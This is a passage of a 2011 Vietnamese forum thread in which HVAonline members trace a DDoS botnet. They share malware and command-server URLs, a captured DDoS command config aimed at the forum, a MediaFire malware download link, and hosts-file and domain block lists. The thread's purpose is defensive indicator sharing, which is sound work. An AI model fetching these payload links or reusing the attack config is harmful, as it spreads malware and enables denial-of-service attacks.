Âu cũng là thời u ám cho nên ngay cả trên thế giới ảo cũng u ám.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 02/08/2011 06:45:39 (+0700) | #273 | 244488
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Sáng nay kiểm tra lại second.dinest.net, tụi nó lại cho DDOS lại:
Code:
1. xv.jpg: 2011-08-02 00:27:53: Bắt đầu khuya hôm nay.
2. xc.jpg: <item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" rootURI="/" uri="/hvaonline/forums/list.hva" keepCookies="1" crawling="1" referer="http://www.hvaonline.net/tof/"/>


DDOS hoài không chán à ta ?

Anh em bà con suy nghĩ thử có cách nào cho cái second.dinest.net này câm luôn không ? Xin cùng nêu ý kiến !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 02/08/2011 11:01:54 (+0700) | #274 | 244489
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Đúng như em nói bọn STL này đe doạ chứ không phải xin xỏ gì cả, English của bọn này toàn học từ thầy Gu Gồ
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 02/08/2011 11:46:50 (+0700) | #275 | 244491
texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
Bọn stl này đúng là điên cuồng, cuồng thật rồi.

http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi

Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 10:06:10 (+0700) | #276 | 244507
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Danh sách các host và các file virus, DDOS commands của tụi stl mà chúng ta đã biết được tính tới thời điểm này:
Code:
1. http://safebrowser.dyndns.org/photos/safebrowser1.gif
2. http://safebrowsing.dyndns-blog.com/photos/safebrowser1.gif
3. http://express.blogdns.info/advertise.gif
4. http://fastupdate.dyndns-office.com/advertise.gif
5. http://hot.enfaqs.com/advertise.gif
6. http://securelogin.doomdns.com/advertise.gif
7. http://tongfeirou.dyndns-web.com/banner1.png
8. http://biouzhen.dyndns-server.com/banner1.png
9. http://maowoli.dyndns-free.com/banner1.png
10. http://poxxf.com/flash.swf
11. http://paxds.com/flash.swf
12. http://poxxf.com/images.gif
13. http://speed.cyline.org:443/flower.bmp
14. http://speed.cyline.org:443/BlueSphere.bmp
15. http://speed.cyline.org:443/plxzyin0fx.bmp
16. http://second.dinest.net/xc.jpg
17. http://second.dinest.net/xv.jpg


Mong bà con phổ biến, bật firewall để lọc các URL trên và các trình capture để check.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 11:42:23 (+0700) | #277 | 244508
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
PXMMRF wrote:
rang0 wrote:
Cùng chào đón 1 server mới của STL nào :

Code:
http://map.priper.info:8080


Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)


Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended


Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)


Em không biết anh check cái "map.ripper.info" thế nào nhưng hôm nay em vẫn download được malware từ cái host đó :

Code:
http://www.mediafire.com/?bdk5fvj8bf8k6nr
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 12:13:04 (+0700) | #278 | 244509
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Công nhận các bạn STL "sneaky" thiệt smilie . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm.

Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn).
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 12:26:31 (+0700) | #279 | 244510
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 13:36:37 (+0700) | #280 | 244512
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
TQN wrote:
Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?


Em quên mất rồi smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 13:39:05 (+0700) | #281 | 244513
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:
Danh sách các host và các file virus, DDOS commands của tụi stl mà chúng ta đã biết được tính tới thời điểm này:
Code:
1. http://safebrowser.dyndns.org/photos/safebrowser1.gif
2. http://safebrowsing.dyndns-blog.com/photos/safebrowser1.gif
3. http://express.blogdns.info/advertise.gif
4. http://fastupdate.dyndns-office.com/advertise.gif
5. http://hot.enfaqs.com/advertise.gif
6. http://securelogin.doomdns.com/advertise.gif
7. http://tongfeirou.dyndns-web.com/banner1.png
8. http://biouzhen.dyndns-server.com/banner1.png
9. http://maowoli.dyndns-free.com/banner1.png
10. http://poxxf.com/flash.swf
11. http://paxds.com/flash.swf
12. http://poxxf.com/images.gif
13. http://speed.cyline.org:443/flower.bmp
14. http://speed.cyline.org:443/BlueSphere.bmp
15. http://speed.cyline.org:443/plxzyin0fx.bmp
16. http://second.dinest.net/xc.jpg
17. http://second.dinest.net/xv.jpg


Mong bà con phổ biến, bật firewall để lọc các URL trên và các trình capture để check.


Chỉ cần thêm mớ này vô host file (trong C:\windows\system32\drivers\etc\) là xong:

Code:
127.0.0.1 safebrowser.dyndns.org
127.0.0.1 safebrowsing.dyndns-blog.com
127.0.0.1 express.blogdns.info
127.0.0.1 fastupdate.dyndns-office.com
127.0.0.1 hot.enfaqs.com
127.0.0.1 securelogin.doomdns.com
127.0.0.1 tongfeirou.dyndns-web.com
127.0.0.1 biouzhen.dyndns-server.com
127.0.0.1 maowoli.dyndns-free.com
127.0.0.1 poxxf.com
127.0.0.1 paxds.com
127.0.0.1 poxxf.com
127.0.0.1 speed.cyline.org
127.0.0.1 second.dinest.net
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 14:16:34 (+0700) | #282 | 244517
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đúng là tụi này thâm và nham hiểm thật. Chỉ một chút sơ hở, chủ quan của anh em ta mà tụi nó đã move và build toàn bộ các bot mới qua host khác. Bây giờ tấn công HVA không còn một mình AcrobatUpdater.exe nữa.
Bà con cứ gặp uxtheme.manifest thì xoá ngay tắp lự giúp em nhé
Cảm ơn rang0 nhé !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 14:21:01 (+0700) | #283 | 244518
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:
Đúng là tụi này thâm và nham hiểm thật. Chỉ một chút sơ hở, chủ quan của anh em ta mà tụi nó đã move và build toàn bộ các bot mới qua host khác. Bây giờ tấn công HVA không còn một mình AcrobatUpdater.exe nữa.
Bà con cứ gặp uxtheme.manifest thì xoá ngay tắp lự giúp em nhé
Cảm ơn rang0 nhé !


He he, cái botnet mới này đấm không nhanh và nhiều như cái cũ mà đấm chậm, chắc và âm ỉ, kiểu như bên ngoài không thấy bị trầy xước nhưng bên trong lục phủ ngũ tạng bị bấy nhầy vậy smilie . Đúng là anh em ta chủ quan quá. Cứ nhắm vô cái botnet đã lộ để phòng thủ nên bị chết là phải.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 14:36:00 (+0700) | #284 | 244520
[Avatar]
tranvanminh
HVA Friend
Joined: 04/06/2003 06:36:35
Bài gởi: 516
Đến từ: West coast
Offline
[Profile] [PM]
He he, cái botnet mới này đấm không nhanh và nhiều như cái cũ mà đấm chậm, chắc và âm ỉ, kiểu như bên ngoài không thấy bị trầy xước nhưng bên trong lục phủ ngũ tạng bị bấy nhầy vậy . Đúng là anh em ta chủ quan quá. Cứ nhắm vô cái botnet đã lộ để phòng thủ nên bị chết là phải.


Anh mô tả mà em đọc như chiêu "Đại lực kim cương chỉ" của thiếu lâm smilie)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 15:01:00 (+0700) | #285 | 244522
vndncn
Member
[Minus] 0 [Plus]
Joined: 21/08/2006 10:38:00
Bài gởi: 77
Offline
[Profile] [PM]
texudo wrote:
Bọn stl này đúng là điên cuồng, cuồng thật rồi.

http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi

Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.



Đi nghe pác Q bom nói. Không biết ngoài Unikey, Vietkey, Winrar có chứa virus không mấy anh nhỉ?
Mấy ngày nay không vào HVA được buồn quá!
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 15:44:47 (+0700) | #286 | 244527
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Em có ít thông tin về cái http://tongfeirou.dyndns-web.com










[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 15:55:18 (+0700) | #287 | 244529
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Tiếp 1 số thứ bên trong













[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 19:08:09 (+0700) | #288 | 244532
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
texudo wrote:
Bọn stl này đúng là điên cuồng, cuồng thật rồi.

http://www.baomoi.com/Home/CNTT/hanoimoi.com.vn/Hon-85000-may-tinh-tai-Viet-Nam-da-bi-lay-cap-du-lieu/6731238.epi

Có bài này của Bkav ...chỉ thấy nhắc tới FLASH, ADOBE ACROBAT UPDATE...mà không thấy đả động giừ tới Vietkey, Unikey cả, mà 2 chương trình gõ tiếng Việt này thì 95% máy tính ở VN có cài.




Ramnit là virus lây file, không phải các virus được đề cập trong chủ đề này đâu.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 19:52:49 (+0700) | #289 | 244535
Dpm
Member
[Minus] 0 [Plus]
Joined: 06/04/2009 01:43:30
Bài gởi: 85
Offline
[Profile] [PM]
conmale wrote:
Công nhận các bạn STL "sneaky" thiệt smilie . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm.

Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn).

Hi anh Conmale,Anh có thể giải thích rõ chỗ màu đỏ đc không,chúng sử dụng kỹ thuật gì vậy anh?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 03/08/2011 21:54:13 (+0700) | #290 | 244541
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
conmale wrote:
Công nhận các bạn STL "sneaky" thiệt smilie . Tớ phải mất một buổi ngồi dòm cái đống log chạy ròng rã mới hiểu được lý do tại sao thằng tomcat của HVA bị treo qua đêm. Các bạn chơi trò đấm rỉ rả kiểu này thiệt là hiểm.

Các bạn muốn bịt miệng HVA như đã bịt miệng những trang khác sao? Các bạn phải biết rằng các bạn chưa đủ sức để bịt cả Internet (ngoài chuyện đặt tường lừa để cản thì không phải bàn).


Tụi STL làm đầy log tomcat hả a smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 01:51:31 (+0700) | #291 | 244547
yuhari
Member
[Minus] 0 [Plus]
Joined: 06/06/2011 20:21:47
Bài gởi: 2
Offline
[Profile] [PM]
trận sáng nay là gì nhỉ smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 02:53:06 (+0700) | #292 | 244549
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
yuhari wrote:
trận sáng nay là gì nhỉ smilie


Trận sáng nay có tên là "thổ phỉ mạo danh chân tu" smilie

Các bạn STL đấm kinh thế?




(hình chụp lúc 3 giờ 22 phút sáng ngày 4 tháng 8 năm 2011).

Đấm cỡ này, các bạn vô diễn đàn thấy nhanh hay chậm?

Cỡ HVA, một diễn đàn phi lợi nhuận, tự duy trì bằng tiền túi mà các bạn đấm không chết nổi thì vứt quách cái botnet đi vì nó chẳng đập nổi ai ngoài mấy cái site nhảm.

Malware thì đạo code, đạo ý tưởng, chắp vá. "hắc kinh" thì chọn kế sách bẩn thỉu nhất (ăn cắp pass) chớ chẳng bao giờ chơi nổi trò tấn công trực diện, thiên hạ thì bị "bạch hoá" bằng cách thêu dệt bậy bạ còn bản thân mình thì chui nhủi như đám sinh vật sợ ánh sáng. Từ kỹ thuật đế tư cách đều thuộc dạng tin tặc hạng bét. Ngay cả bọn blackhat chôm chĩa credit card hay cho thuê bot để tấn công thiên hạ còn có một chút nguyên tắc và mục đích thấp hèn là để kiếm tiền. Các bạn thì chỉ loay hoay với một mớ niềm tin và tự ái vặt để làm những việc bại hoại, đáng phỉ nhổ. Các bạn trẻ tuổi nông nổi thì không nói gì, các bạn đã có tuổi và đã kinh qua mà vẫn hỗ trợ những trò bại hoại, thấp hèn như thế này thì không biết các bạn đang cố bảo vệ cái gì nữa, chắc là các bạn đang bảo vệ cái gì "đẹp đẽ" lắm.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 06:10:53 (+0700) | #293 | 244550
texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
http://www.ictnews.vn/Home/bao-mat/Lien-Hop-Quoc-nan-nhan-cua%C2%A0vu-tan-cong-mang-lich-su/2011/08/2MSVC1986453/View.htm

Không biết có liên quan gì tới những gì mà HVA Team đang phân tích không? Nhưng bản chất đằng sau việc này là Khựa, có khi nào khựa nó có một công ty của chính phủ chuyên làm nhiệm vụ này, trong đó STL là một team trong đó?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 07:29:21 (+0700) | #294 | 244554
[Avatar]
elt0m
Member
[Minus] 0 [Plus]
Joined: 24/07/2011 22:41:39
Bài gởi: 23
Offline
[Profile] [PM]
TQN wrote:
Ặc ặc, đọc tới đây mà không biết stl là gì à ?
stl = sinh tử lệnh = sống chết theo lệnh !?
stl # STL: C++ Standard Template Library nhé. Chớ nhầm lẫn là tụi coder C++ khắp thế giới nhảy vào phang đấy.


xin lỗi spam tý nhé!

Theo mình lũ này phải gọi là: Sờ Ti Lợn (STL) mới đúng! smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 08:13:36 (+0700) | #295 | 244557
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
rang0 wrote:
PXMMRF wrote:
rang0 wrote:
Cùng chào đón 1 server mới của STL nào :

Code:
http://map.priper.info:8080


Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)


Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended


Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)


Em không biết anh check cái "map.ripper.info" thế nào nhưng hôm nay em vẫn download được malware từ cái host đó :

Code:
http://www.mediafire.com/?bdk5fvj8bf8k6nr



Domain map.ripper.info là tên miền con (subdomain) của domain ripper.info. Tên miền ripper.info bị suspended (treo). Có một số lý do khiến tên miền bị treo, trong đó lý do chính, phổ biến là người dùng (registrant) không, chưa trả tiền đúng thời hạn cho công ty quản lý domain (registrar).
Domain chính ripper.info bị treo thì các subdomain của nó dĩ nhiên cũng bị treo trong sử dụng.
Công ty quản lý domain này (ripper.info) là SEDO, (Anh quốc).

Domain và website mang tên domain gắn chặt với nhau, nhưng không phải là một. Vì vậy khi domain bị treo, website vẫn có thể vẫn active, nhưng nói chung chỉ được vài ngày. Lý do là việc create host hay thay đổi create host mất công và tốn thời gian (khoảng tối thiểu 2 ngày), nên registrar cân nhắc trong việc này: Họ cảnh báo tình trạng suspended để người dùng mau chóng trả tiền, như thế họ không cần phải create host lại. Đồng thời họ cũng đợi có khách hàng mới mua lại
domain này thì create host lai luôn thể.

Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngày sau đó, STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info.

Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO

Trang chủ của website của công ty SEDO:
http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e

Đây là trang của SEDO thông báo bán ripper.info:
http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e

Note:

1- Từ ngày 2-8 tôi đã hoàn tất việc thiết lập một sever (loai nhỏ nhưng có 2 CPU) riêng, chuyên dùng để kiểm tra các virus-trojạn của STL, xác định chính xác các kết nối trên mạng của các virus-trojan này. Server được cài nhiều chương trình theo rõi mạng, antivirus, firewall tiên tiến.
Tôi đang thử file Unikey của bạn lequi trước đây đã cung cấp. Sẽ thông báo kết quả cụ thể sau.

2- Tôi đã có đủ thông tin về webserver-website "speed.cyline.org" của STL. Cũng sẽ thông báo hầu các bạn


The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 08:31:11 (+0700) | #296 | 244558
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
PXMMRF wrote:


Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngay sau đó STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info.

Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO

Trang chủ của website của công ty SEDO:
http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e

Đây là trang của SEDO thông báo bán ripper.info:
http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e




Anh ơi "ripper.info" với "pripper.info" là nó khác nhau đấy ạ.

Hôm nay cái subdomain này lại được trỏ sang con server khác rồi. Hôm trước

Code:
Trước: map.priper.info [91.121.221.222]
Hôm nay : map.priper.info [208.115.200.206]


Và malware vẫn đang được cập nhật đều .
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 09:00:15 (+0700) | #297 | 244561
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
rang0 wrote:
PXMMRF wrote:


Vì vậy vào ngày 1-8-2011 tôi phát hiện ra domain ripper.info bị suspended, thì có thể trong một hai ngay sau đó STL vẫn còn tận dụng đươc domain nay để active website map.ripper.info.

Tuy nhiên đến ngày 3-8 (hôm qua) thì domain này đã trỏ đến một trang của website của công ty SEDO

Trang chủ của website của công ty SEDO:
http://www.sedo.com/uk/home/welcome/?tracked=1&partnerid=20293&language=e

Đây là trang của SEDO thông báo bán ripper.info:
http://www.sedo.com/search/details.php4?domain=ripper.info&trackingRequestId=16343907&tracked=1&partnerid=20293&language=e




Anh ơi "ripper.info" với "pripper.info" là nó khác nhau đấy ạ.

Hôm nay cái subdomain này lại được trỏ sang con server khác rồi. Hôm trước

Code:
Trước: map.priper.info [91.121.221.222]
Hôm nay : map.priper.info [208.115.200.206]


Và malware vẫn đang được cập nhật đều .


Ừ khác nhau, nhiều là khác. Như là PHAM XUAN MAI với ĐẶNG THÁI MAI. Người sau là một danh nhân nước Việt, bố vợ của Đại tướng huyền thoại VÕ NGUYÊN GIÁP. Còn kẻ trước chỉ là một người dân bình thường, không tên tuổi, tuy được học hành bài bản đến nơi đến chốn (bằng cấp thật 100%), nhưng khả năng có hạn. HÌ hì.
Đùa một chút. Thôi trở lại vấn đề.

Xem lai bài của rang0 (trang 9 topic này) thì domain đúng là map.priper.info thật. Nhưng vào đia chỉ này http://map.priper.info:8080 (webserver mở cổng 8080-chắc cài Apache) thì cũng lại thấy domain này cũng bị suspended. Thôi để tôi kiểm tra kỹ hơn.
Nếu http://map.priper.info cũng đang bị suspended thật, thì những nôi dung tôi viết ở post trên liên quan đến vấn đề "suspended" vẫn hoàn toàn có thể áp dụng được với map.priper.info(trừ đoan sau nói về ripper.info domain)
Nôi dung liênquan đến suspended domain là:

"Có một số lý do khiến tên miền bị treo, trong đó lý do chính, phổ biến là người dùng (registrant) không, chưa trả tiền đúng thời hạn cho công ty quản lý domain (registrar)
...................
Domain và website mang tên domain gắn chặt với nhau, nhưng không phải là một. Vì vậy khi domain bị treo, website có thể vẫn active, nhưng nói chung chỉ được vài ngày. Lý do là việc create host hay thay đổi create host mất công và tốn thời gian (khoảng tối thiểu 2 ngày), nên registrar cân nhắc trong việc này: Họ cảnh báo tình trạng suspended để người dùng mau chóng trả tiền, như thế họ không cần phải create host lại. Đồng thời họ cũng đợi có khách hàng mới mua lại domain này thì create host lai luôn thể."

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 09:27:48 (+0700) | #298 | 244562
trycatch
Member
[Minus] 0 [Plus]
Joined: 07/12/2010 20:00:36
Bài gởi: 15
Offline
[Profile] [PM]
Theo dõi file anh Conmale thông báo (ddos_28-07-2011) thì có IP của cơ quan em(nhiều subnet) nên mình không biết cách xác định máy nào nhiễm malware của STL vì ko phải net admin chỉ là người dùng.
bạn nào có cách hay soft gì thì hướng dẫn mình với.
ps: báo cáo anh Conmale là file ddos-03-08-2011-uniq thì không có, nếu anh có cách gì thì mail cho em với nhé, em muốn góp chút gì đó để HVA giảm được tấn công ddos. E-mail và IP của em thì chắc anh thừa biết rồi. :d
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 17:29:16 (+0700) | #299 | 244567
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
trycatch wrote:
Theo dõi file anh Conmale thông báo (ddos_28-07-2011) thì có IP của cơ quan em(nhiều subnet) nên mình không biết cách xác định máy nào nhiễm malware của STL vì ko phải net admin chỉ là người dùng.
bạn nào có cách hay soft gì thì hướng dẫn mình với.
ps: báo cáo anh Conmale là file ddos-03-08-2011-uniq thì không có, nếu anh có cách gì thì mail cho em với nhé, em muốn góp chút gì đó để HVA giảm được tấn công ddos. E-mail và IP của em thì chắc anh thừa biết rồi. :d



Cách dễ nhất là search từng máy để tìm "AcrobatUpdater.exe".

Cách ngăn chặn nhanh nhất ngay lúc này là chặn các domains và subdomains sau:

dyndns.org
dyndns-blog.com
blogdns.info
dyndns-office.com
enfaqs.com
doomdns.com
dyndns-web.com
dyndns-server.com
dyndns-free.com
poxxf.com
paxds.com
cyline.org
dinest.net
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 04/08/2011 17:33:28 (+0700) | #300 | 244568
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
Tìm mãi không biết từ đâu mà mình có cái domain "map.ripper.info" thay vì phải là "map.priper.info" mới đúng.
Nay đã thấy. Hì hì

TQN on 03/08/2011 14:36:37 wrote:
Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?


rang0 wrote:
TQN wrote:
Xin hỏi rang0 đường link map.ripper.info được lấy từ đâu và thằng virus nằm vùng nào lên đấy down về ?


Em quên mất rồi smilie
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)